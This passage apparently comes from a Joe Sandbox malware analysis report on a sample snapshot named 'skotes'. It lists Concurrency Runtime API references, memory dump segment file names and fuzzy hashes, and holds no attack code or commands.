                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14E08C6B98C2246CA04391D637086BEA3ACA8E32353708D37F442C1003BAC8921D6038
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00B90F16
                                                                                                                                                                                                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00B90F62
                                                                                                                                                                                                                                            • Part of subcall function 00B9265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00B92750
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00B90FCE
                                                                                                                                                                                                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00B90FEA
                                                                                                                                                                                                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00B9103E
                                                                                                                                                                                                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00B9106B
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00B910C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                          • API String ID: 2943730970-3887548279
                                                                                                                                                                                                                                          • Opcode ID: e7df1978b8ef8aed20b69e29c5d16cd2450e31ba9361aa3eddf9b3e7a949f9fb
                                                                                                                                                                                                                                          • Instruction ID: 5ea563f64a1022e2d5741ae94c5522a46bf82b49cf195afa78bc16e80b4fc329
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7df1978b8ef8aed20b69e29c5d16cd2450e31ba9361aa3eddf9b3e7a949f9fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67B15B70A01616EFDF28DF58D991B7AB7F4FF44300F1445AAE905AB291D731AD81CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00B92CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00B92D0F
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00B91614
                                                                                                                                                                                                                                            • Part of subcall function 00B92E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00B92E39
                                                                                                                                                                                                                                            • Part of subcall function 00B92E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00B92EA8
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00B91746
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00B917A6
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00B917B2
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00B917ED
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00B9180E
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00B9181A
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00B91823
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00B9183B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2508902052-0
                                                                                                                                                                                                                                          • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                          • Instruction ID: a1f1e9cd8fd441dd77fce812c41ec19aad8e0d80d3484b50d6a2f50f5a84bbd2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7814971E00626AFCF19DFA8C580A6DB7F1FF48304B254AADD445A7701C770AD52DB84
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B9EC81
                                                                                                                                                                                                                                            • Part of subcall function 00B98F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00B98F50
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00B9ECE7
                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00B9ECFF
                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00B9ED0C
                                                                                                                                                                                                                                            • Part of subcall function 00B9E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00B9E7D7
                                                                                                                                                                                                                                            • Part of subcall function 00B9E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00B9E86F
                                                                                                                                                                                                                                            • Part of subcall function 00B9E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00B9E879
                                                                                                                                                                                                                                            • Part of subcall function 00B9E7AF: Concurrency::location::_Assign.LIBCMT ref: 00B9E8AD
                                                                                                                                                                                                                                            • Part of subcall function 00B9E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00B9E8B5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2363638799-0
                                                                                                                                                                                                                                          • Opcode ID: d49484e2fb68b4a304f7cb7b51867957bc4648671bd083acebbf3bdc3d9cc557
                                                                                                                                                                                                                                          • Instruction ID: 0a4a1c61959b8f2f176987d87269e538f664443338ee266019596281939a984d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d49484e2fb68b4a304f7cb7b51867957bc4648671bd083acebbf3bdc3d9cc557
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A515A31A00205DBDF24EF54C895BADB7B5EF44310F1540B9E9166B3A6CB71AE05CBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtFlushProcessWriteBuffers.NTDLL ref: 00B8CBAA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
